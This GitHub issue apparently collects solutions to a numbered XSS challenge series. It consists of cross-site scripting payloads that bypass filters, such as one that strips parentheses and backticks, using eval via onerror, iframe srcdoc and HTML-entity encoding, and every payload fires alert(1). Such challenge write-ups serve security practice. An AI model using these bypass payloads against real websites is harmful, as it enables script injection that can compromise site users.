Skip to content

0x04 #26

@ffffff0x

Description

@ffffff0x

0x04

过滤圆括号()以及反撇号` input.replace(/[()`]/g, '')

<script>window.onerror=eval;throw'=alert\x281\x29'</script
<iframe srcdoc="<script>parent.alert&#40;1&#41;</script>"
<svg><script>alert&#40;1&#41</script
<svg onload=alert&#40;1&#41

0x05

--!><svg onload=alert(1)>

Originally posted by @iMusic in #1 (comment)

0x09

https://www.segmentfault.com"></script><svg onerror=alert(1)><script>

0x0B||0x0C

<img src onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions